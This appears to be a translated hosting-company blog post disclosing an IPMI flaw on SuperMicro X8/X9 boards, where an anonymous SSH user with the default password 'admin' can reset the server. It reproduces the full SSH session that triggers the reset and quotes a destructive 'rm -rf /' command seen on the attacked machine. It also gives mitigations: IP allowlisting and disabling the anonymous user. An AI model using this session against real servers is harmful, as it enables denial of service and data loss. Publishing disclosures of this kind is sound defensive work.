IPMI - vulnerability in shell v. 1.00 allows you to restart the server

Welcome, dear Khabrovites! From now on, the GlobaTel team will try to please you with informative articles in the field of hosting and data centers, and will also sometimes publish our achievements from a purely technical point of view.

Today I would like to start with a simple but very important article about how we came across a glaring hole in IPMI. One of our clients complained that a brand-new server with a Xeon E3 from a well-known Russian brand rebooted very often. Logging in to the server's IPMI, we saw a command actively being typed:

rm -rf /

Whoever has seen this will understand. We pulled out the power cord and went with a netbook to set up the server and figure out what was what.

I must say right away that we solved this problem by blocking all IPMI IP addresses. Access to them is now granted only to client IP addresses, upon prior request.
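One way to express the allowlist described above as firewall rules, as an added example that is not part of the original article. It assumes a Linux gateway running iptables in front of the IPMI addresses; the function name `gen_ipmi_rules`, the chain name `IPMI-GUARD`, the allowlist format and the sample addresses are illustrative assumptions.

```shell
# Added example (not from the original article). Assumption: a Linux gateway
# running iptables forwards traffic to the IPMI/BMC addresses.
# Input on stdin: "bmc_ip [client_ip]" per line; '#' starts a comment line.
# Output: iptables commands that drop all traffic to each BMC except from the
# client IPs listed for it. A BMC with no valid client is blocked entirely.

gen_ipmi_rules() {
    awk '
    function ipv4(a,    o, i) {            # 1 if a is a dotted quad, octets 0-255
        if (split(a, o, ".") != 4) return 0
        for (i = 1; i <= 4; i++)
            if (o[i] !~ /^[0-9]+$/ || o[i] + 0 > 255) return 0
        return 1
    }
    /^[ \t]*#/ || /^[ \t]*$/ { next }      # comments and blank lines
    !ipv4($1) {                            # cannot protect an address we cannot parse
        printf "line %d: bad BMC address, ignored: %s\n", NR, $0 > "/dev/stderr"
        bad = 1; next
    }
    {
        if (!($1 in seen)) { seen[$1] = 1; bmc[++cnt] = $1 }
        if (NF < 2) next                   # BMC listed alone: block, no exceptions
        if (ipv4($2))
            allow[$1] = allow[$1] "iptables -A IPMI-GUARD -s " $2 " -d " $1 " -j ACCEPT\n"
        else {                             # fail closed: no ACCEPT for a bad client
            printf "line %d: bad client address, not allowed: %s\n", NR, $2 > "/dev/stderr"
            bad = 1
        }
    }
    END {
        print "iptables -N IPMI-GUARD"
        for (i = 1; i <= cnt; i++) {
            printf "%s", allow[bmc[i]]
            print "iptables -A IPMI-GUARD -d " bmc[i] " -j DROP"
        }
        print "iptables -I FORWARD -j IPMI-GUARD"
        exit bad + 0                       # non-zero if any line was rejected
    }'
}

# Constructed sample allowlist (RFC 5737 documentation addresses).
SAMPLE_ALLOWLIST='# bmc_ip    client_ip
192.0.2.10 198.51.100.7
192.0.2.10 198.51.100.8
192.0.2.11
192.0.2.12 203.0.113.999'

# Print the generated rules for review; nothing is applied to the firewall here.
printf '%s\n' "$SAMPLE_ALLOWLIST" | gen_ipmi_rules || echo "allowlist had rejected lines" >&2
```

The script only prints commands, so the rule set can be reviewed before anything is applied on the gateway.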

The issue lies in shell version 1.00.

Here we show part of the tricks that can be pulled off (a server reboot). Not everyone knows that it is possible to connect to IPMI via SSH. It is this feature that allows the server to be restarted. It turns out that the web interface does not let you change the password of the anonymous user, which has the standard password admin and which, for some reason, can restart the machine via SSH.

Below is the list of commands used when connecting to IPMI via SSH, followed by a ping of the server. As the ping shows, there is no reply: the server is restarting.

Password of anonymous: admin
# ssh -o PreferredAuthentications=password,keyboard-interactive -l "" IPMI
@IPMI's password:
Auth User/Pass with PS...pass.

ATEN SMASH-CLP System Management Shell, version 1.00
Copyright (c) 2008-2009 by ATEN International CO., Ltd.
All Rights Reserved

-> show
/

Targets :
system1

Properties :
None

Verbs :
cd
show
help
version
exit

-> cd system1
/system1

-> show /system1/pwrmgtsvc1
/system1/pwrmgtsvc1

Targets :
none

Properties :
Name=IPMI Power Service
CreationClassName=IPMI_PowerManagementService
ElementName=Server Power Management Service
EnabledState=5
RequestedState=12
EnabledDefault=2
PowerState=1

Verbs :
cd
show
help
version
exit
start
stop
reset

-> reset /system1/pwrmgtsvc1
/system1/pwrmgtsvc1
reset done...




ping IpOfServer

Pinging IpOfServer with 32 bytes of data:
Reply from IpOfServer: Destination host unreachable.
Reply from IpOfServer: Destination host unreachable.
Reply from IpOfServer: Destination host unreachable.
Reply from IpOfServer: Destination host unreachable.

Ping statistics for IpOfServer:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),





Addition: the problem relates to IPMI 2.0 (not the BIOS) version 1.00 for SuperMicro motherboards of the X8 and X9 series and dual-processor boards for Xeon 56xx series processors.

The anonymous user must be disabled via ipmitool.

The listing for installing on Linux, followed by the command to disable the anonymous user:

wget ftp.supermicro.com/utility/IPMICFG/Linux/IPMICFG-Linux_v1.41.zip
unzip IPMICFG-Linux_v1.41.zip
cd IPMICFG-Linux_v1.41_110706/
chmod 755 *




ipmitool user disable 1
